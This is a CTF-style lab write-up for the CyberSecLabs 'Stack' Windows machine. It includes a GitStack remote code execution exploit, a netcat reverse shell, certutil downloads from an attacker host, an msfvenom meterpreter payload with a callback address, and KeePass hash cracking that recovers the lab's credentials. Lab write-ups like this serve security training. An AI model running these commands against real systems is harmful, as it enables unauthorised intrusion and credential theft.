Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Scanning and Enumeration
  • Nmap
  • Port 445 (SMB)
  • Port 80 (HTTP)
  • Dirb
  • Exploitation
  • Reverse Shell as user
  • Privilege Escalation

Was this helpful?

  1. Writeups
  2. CyberSecLabs
  3. Windows

Stack

https://www.cyberseclabs.co.uk/labs/info/Stack/

Scanning and Enumeration

Nmap

Running an initial Nmap scan with the -A switch produces the following.

sudo nmap 172.31.1.12 -p-  -A                                                                                                                                                                                              
                                                                                                                                                                                                             
PORT      STATE SERVICE            VERSION                                                                                                                                                                                                 
135/tcp   open  msrpc              Microsoft Windows RPC                                                                                                                                                                                   
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn                                                                                                                                                                           
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds                                                                                                                                                    
3389/tcp  open  ssl/ms-wbt-server?                                                                                                                                                                                                         
| rdp-ntlm-info:                                                                                                                                                                                                                           
|   Target_Name: STACK                                                                                                                                                                                                                     
|   NetBIOS_Domain_Name: STACK
|   NetBIOS_Computer_Name: STACK
|   DNS_Domain_Name: Stack
|   DNS_Computer_Name: Stack
|   Product_Version: 6.3.9600
|_  System_Time: 2020-12-09T10:05:50+00:00
| ssl-cert: Subject: commonName=Stack
| Not valid before: 2020-12-08T09:56:41
|_Not valid after:  2021-06-09T09:56:41
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
49164/tcp open  msrpc              Microsoft Windows RPC

Port 445 (SMB)

First up we can check against SMB with null authentication. I was unable to authenticate unfortunately with various tools.

Enum4linux also aborted due to null authentication errors.

Port 80 (HTTP)

Port is open so we can start with Gobuster and Nikto to see what information we can initially pull before physically browsing to the webpage.

The Firefox extension 'Wappalyzer' confirms the following information regarding the webpage.

Dirb

I did not get results from Gobuster so decided to use a recursive directory enumeration tool. On finding the /web/ directory dirb then found /web/index.php.

After browsing to the directory we come to the following page.

Exploitation

After searching around this I found nothing of interest and dead ends.. We do have a name in the tab of 'GitStack Web'.

After searching on Google we come to the following hosted on exploit-db.com

This is a python script in which all we need to do is change the IP and the command we want to execute. This should hopefully give us remote command execution on the server.

We can run the script and confirm remote code execution with the ipconfig command.

Reverse Shell as user

We should now attempt to gain a proper reverse shell so we can enumerate the server properly.

I started off by opening a Python SimpleHttpServer in a directory that hosts nc.exe.

sudo python2 -m SimpleHTTPServer 80

Then I edited the exploit to download the nc.exe file from my attacking machine.

I then created a netcat listener on my attacking machine in preparation for the next step.

nc -lvp 4444

Now we can edit the command in the exploit to call the nc.exe we uploaded back to the listener running on our attacking machine.

After executing the exploit we manage to get a reverse shell and confirm the user we are running as.

Privilege Escalation

I then downloaded winPEAS.exe with certutil.exe from my attacking machine.

certutil.exe -f -urlcache split http://<IP>/winpeas.exe

After running we can see that we have the 'SeImpersonatePrvilege' set.

I then ran the systeminfo command on the system to check OS version.

As we are running Windows Server 2012 R2 Standard and have the SeImpersonatePrivilege we can more than likely run a juicy / rotten potato attack to escalate our privileges.

I ran the systeminfo command information against Windows-exploit-suggester.py which has reinforced for us that we can likely perform this type of attack for privilege escalation.

I previously covered a JuicyPotato attack on my writeup for HackTheBoxe's Bart. This was covered without metasploit so I will take this opportunity to include the attack with metasploit in a writeup.

First I created a payload for meterpreter with msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.173 LPORT=4455 -f exe -o /home/kali/scripts/windows/metshell.exe

I then downloaded the payload on to the machine with certutil.exe

I then run the module exploit/multi/handler on Metasploit and set the correct information and set the payload to be the exact same as the one specified in the msfvenom command. I then run the Metasploit module and once the listener was set up and running I then executed the uploaded payload on the server.

At this point It could take a while to find the correct CLSID to use against this server. I want to explore more attack vectors first.

One of the interesting bits of information I found earlier was a file called 'password_manager.kdbx'.

After performing a Google search the file extension belongs to KeePass which is a password manager. The file appears to be a database file.

After searching for exploits with the KeePass database file I found some blogposts where we can convert the KeePass database file into a hash with a John the Ripeepr module called KeePass2John which we can then attempt to crack.

Since we are already in a meterpreter shell we can just run the download command with the path of the KeePass database to download.

We can then run the keepass2john command on Kali to convert the file to a hash format.

keepass2john password_manager.kdbx > /home/kali/Desktop/keepassdatabase.hash

We can then check John for available formats.

We can then run John against the has with the --format=KeePass switch.

sudo john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/keepassdatabase.hash 

Now that John has cracked the password of 'princess' we can now install KeePass2 and see if we can open the database file with the password we have cracked.

sudo apt-get install KeePass2

Once downloaded open Keepass2 and load the database file. You will then be presented with a credentials screen to open the database.

We can then open the Administrators profile and view the stored password.

John's password:

We now have credentials to the following:

  • Administrator:secur3_apass262

  • John:whLd49NnsDWRJ7KW

I actually tried cracking the NTLMv2 hash for the John account much earlier on before I noticed a KeePass file on the system. I captured it by setting up a SMB server on my attacking machine and getting the user account to authenticate against it. Makes sense I could not crack it when the password is that strong.

Since RDP is open I connected as the Administrator account and was successful.

We can also log in with Evil-WinRM as port 5985 is open.

Last updated 2 years ago

Was this helpful?

The root page takes us to the following when browsing to in a web browser.

I tried multiple times to get the Metasploit module working for JuicyPotato and could not get a valid CLSID to perform the escalation with

🚩
http://172.31.1.12
.
CLSID list
GitStack - Remote Code ExecutionExploit Database
Logo